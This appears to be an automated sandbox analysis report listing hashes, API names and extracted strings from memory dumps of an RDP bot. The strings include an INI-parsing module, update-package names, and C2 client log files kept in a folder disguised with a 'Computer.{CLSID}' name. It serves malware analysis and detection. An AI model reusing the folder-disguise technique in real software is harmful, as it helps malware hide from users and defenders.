    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
    • API String ID: 3596500743-1991603811
    • Opcode ID: 5fa133a0e2a216fde6512bfdf3a05fbf46f16c42755a9a9a46345d0d237b952d
    • Instruction ID: c35f397888689a2814b4d4f7e9248b7be6e3c9e14def01476265f2834f7717ad
    • Opcode Fuzzy Hash: 5fa133a0e2a216fde6512bfdf3a05fbf46f16c42755a9a9a46345d0d237b952d
    • Instruction Fuzzy Hash: BE217121A08A4B92E752DF12ED40BAA7360BB847A4F444171EE8C477F5DFBDE846C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: _errno$_strtoui64
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
    • API String ID: 3513630032-2210897324
    • Opcode ID: e13d46a93c286f878066485ecde981a33247f1e20d45bf4f8e92133a70466138
    • Instruction ID: b5f19679a71c28bd62d9fa74d07e92517183936496122502cac29208d4e597b7
    • Opcode Fuzzy Hash: e13d46a93c286f878066485ecde981a33247f1e20d45bf4f8e92133a70466138
    • Instruction Fuzzy Hash: CC21A521A08E43CDE6508F16F8407AA7365BB647A8F4441B2EE5E57B74CF3CE989C704
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: _errno$_strtoui64
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
    • API String ID: 3513630032-2210897324
    • Opcode ID: f75d34ed516198f01ab056ec250f59175d23025d401488cd657c0209166de838
    • Instruction ID: 8911999234356946425fb8b6d4dc17ed17ddc8704f79ecd673dbe6932265f3c2
    • Opcode Fuzzy Hash: f75d34ed516198f01ab056ec250f59175d23025d401488cd657c0209166de838
    • Instruction Fuzzy Hash: FA216862A08A8686E2619F65F8407AA3362FB44B88F444137EECC47764DF3CE989C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: _errno$_strtoui64
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
    • API String ID: 3513630032-2210897324
    • Opcode ID: b1aee9f97c9f1de0cce9060c28bf6999ed44af3186cd3ea7dc81b6eb11d245c2
    • Instruction ID: c62d4453c216466d799934f18819c5bfa8fbbbd7cdbfa9780121892cc70923c1
    • Opcode Fuzzy Hash: b1aee9f97c9f1de0cce9060c28bf6999ed44af3186cd3ea7dc81b6eb11d245c2
    • Instruction Fuzzy Hash: 95218021A08E4A96E7569F16FC407AA73A0FB847A4F544072EE8D476F4DFBCE946C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: _errno$_strtoui64
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
    • API String ID: 3513630032-2210897324
    • Opcode ID: f0151673459d954fc5dcff731ee88424ac42232836fb278fb00586788237db9e
    • Instruction ID: e811b6a7a4f8db158d4166d2aca6633958d7d47f7bb0ec7fa6ae695200235764
    • Opcode Fuzzy Hash: f0151673459d954fc5dcff731ee88424ac42232836fb278fb00586788237db9e
    • Instruction Fuzzy Hash: FC216D21608E4395EB519FAAFC407AB23A9BB457A8F844072EE4C47774DF3CE985C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: _errno$_strtoui64
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
    • API String ID: 3513630032-2210897324
    • Opcode ID: fa2a4e27047f47fddf336384d84b89814b392c4204742b02eeeaeb802e8f0b0f
    • Instruction ID: 070b834b722de0666c3ecd88461cfd6e7306df144cec89976a725ee1fe67d144
    • Opcode Fuzzy Hash: fa2a4e27047f47fddf336384d84b89814b392c4204742b02eeeaeb802e8f0b0f
    • Instruction Fuzzy Hash: 82218B62A08A4795E661AF15FC447AA73A4BB88B84F444137EECC47775DF3CE885C740
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: _errno$_strtoui64
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
    • API String ID: 3513630032-2210897324
    • Opcode ID: 07b2089ee97cb13c1d755c90fbf921b0eceee61a6633eae07e5fa0cfb09a47f8
    • Instruction ID: a38f0620dee4862648a1dd4eaf3c6c88d54c0c0891a8728ac0d746980dda0885
    • Opcode Fuzzy Hash: 07b2089ee97cb13c1d755c90fbf921b0eceee61a6633eae07e5fa0cfb09a47f8
    • Instruction Fuzzy Hash: 1B213D62B09B4796E6319F15F8407AA67A4FB48784F444136EE8D47774EF3CE985CB00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
    • API String ID: 1004003707-3780280517
    • Opcode ID: 4b024a6b28ce2b07e7a2910d768eb0d7eedf76f45639da4cab46353fdb6778d0
    • Instruction ID: c093707266c497001855f458bfbddb574c281cad5834fcce0d0e358e286bd96f
    • Opcode Fuzzy Hash: 4b024a6b28ce2b07e7a2910d768eb0d7eedf76f45639da4cab46353fdb6778d0
    • Instruction Fuzzy Hash: 89415261E08E47DDFA508B53E9413F86361BB24364F4442F2D96E666B1DF3CE58AC348
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
    • API String ID: 1004003707-3780280517
    • Opcode ID: 29ebf32fd85aaa6c302b57af4e383905eb192d8d050791926176978d225b6fbe
    • Instruction ID: 8604748a448cd595410404db1d366194200e4ff7e4883eae85a86e5e62998328
    • Opcode Fuzzy Hash: 29ebf32fd85aaa6c302b57af4e383905eb192d8d050791926176978d225b6fbe
    • Instruction Fuzzy Hash: B64129A1A08B47A6FA609B20E8403F87361FF54358F844137EAED462B5DF7CE95AC300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
    • API String ID: 1004003707-3780280517
    • Opcode ID: 4413dc6e3f6250dd8d36c19e406b8351c08953a7a009de5be6584f3d82e10626
    • Instruction ID: 0126deb30bc5419d33dc8af7b8e3208ea347b01a3f764507b121263f46423eb8
    • Opcode Fuzzy Hash: 4413dc6e3f6250dd8d36c19e406b8351c08953a7a009de5be6584f3d82e10626
    • Instruction Fuzzy Hash: 37411C61A08E4FD7FA1ACF52AD447F82360AB44768F4544B2DA8C461F1EFBCE946C300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
    • API String ID: 1004003707-3780280517
    • Opcode ID: baa5269c21e4732f51f4d8c06ff15b0a280de119eeecf7f346a5e47aac46175b
    • Instruction ID: 336ff204e5507505f3e6cd685262a7ca2dcc8f74fc797f1affa4d6c93779b46e
    • Opcode Fuzzy Hash: baa5269c21e4732f51f4d8c06ff15b0a280de119eeecf7f346a5e47aac46175b
    • Instruction Fuzzy Hash: 49413CA1F0864791FA609F41E8403F8A360BF48B48F854137EADD566B6DF7CE986C380
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
    • API String ID: 1004003707-386092548
    • Opcode ID: cc754a487619ba4d3fe55a8fff3b75e044976832e5e2ad57f523f8373a74ed8a
    • Instruction ID: 454238818a535c7967d7896f574b9c709fe8f6020af679da726525fa4d402685
    • Opcode Fuzzy Hash: cc754a487619ba4d3fe55a8fff3b75e044976832e5e2ad57f523f8373a74ed8a
    • Instruction Fuzzy Hash: 40416365E08E47DDFA508B13E9017B86261BF303A8F4446F6E96E269B1DF3DE585C308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
    • API String ID: 1004003707-386092548
    • Opcode ID: b0ace65d0544e08878f1069df199fb0ae34c20e66282c48064816a280043140a
    • Instruction ID: a5ae48e7a6bd06b8a5f1e041c2207d86c09161e37369ee7a79178cd943417a91
    • Opcode Fuzzy Hash: b0ace65d0544e08878f1069df199fb0ae34c20e66282c48064816a280043140a
    • Instruction Fuzzy Hash: 50412CA1A0C64796FB609B60E9407F87261FF50388F884037DAED5A6B5DF7CE989C300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
    • API String ID: 1004003707-386092548
    • Opcode ID: fd83ec08a632a1a5050c5c11268c840856166cd656e16e484ef7c1645f6c2824
    • Instruction ID: 5b8a3e544a1f576df1d119d0b6be61aa97049ab4321f1be0c37476f4a019fca7
    • Opcode Fuzzy Hash: fd83ec08a632a1a5050c5c11268c840856166cd656e16e484ef7c1645f6c2824
    • Instruction Fuzzy Hash: 38414DA1A08E8FD6FA16DF43ED447B42250BB54768F4440B2DA8C061F1EFBCE98AC340
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: strcmp
    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
    • API String ID: 1004003707-386092548
    • Opcode ID: 551c19bd1324a9293b0d9cfbcd7f4f82ae8a189173a1b29672ef480067d49603
    • Instruction ID: fa0cfde12ae4a77c873c58f2a7c791d506db84f9661bc29fbee91fee7dc7f18b
    • Opcode Fuzzy Hash: 551c19bd1324a9293b0d9cfbcd7f4f82ae8a189173a1b29672ef480067d49603
    • Instruction Fuzzy Hash: 48413BA1B0864791FA20AF50F8403B4A260BF58B88F49413BDEDD1A5B6DF7CE985C380
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: strlen
    • String ID: .applied$????-pat$pkg$tch.pkg$update.p
    • API String ID: 39653677-1686225151
    • Opcode ID: c173e9b1be122b58ee2805fee9d2ea4c3f3e24ec3b5cd1edd9f56f5051aea604
    • Instruction ID: 5f6e538590bdf0321e182ff3d233c711ad33a60027e0731a8b9319bfb006f54b
    • Opcode Fuzzy Hash: c173e9b1be122b58ee2805fee9d2ea4c3f3e24ec3b5cd1edd9f56f5051aea604
    • Instruction Fuzzy Hash: 4F21D71390CB4743FB215A25991437D17AA4B15BC8F444830DE4EEB793DE2EA854E347
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
    • API String ID: 513531256-1680544107
    • Opcode ID: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
    • Instruction ID: 95c8480718dffb3bbdb36f89bd843c493f71d2301b455718d700e08c5d62dd0b
    • Opcode Fuzzy Hash: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
    • Instruction Fuzzy Hash: B4418621A0CE41CDF3209B17E8543BE2752ABE47A0F5001B1DA1EA7BB5CF3CE5858748
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
    • API String ID: 513531256-3034662401
    • Opcode ID: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
    • Instruction ID: cd175909b749c0c38ab7b4a89dd9f0dae7cb71a1a218ebebd723514efd664a48
    • Opcode Fuzzy Hash: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
    • Instruction Fuzzy Hash: DD41AE31A0CA858AF724EB16EC603BA2265BBA47A0F8000B1DA4D477F5CFBCE585C740
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
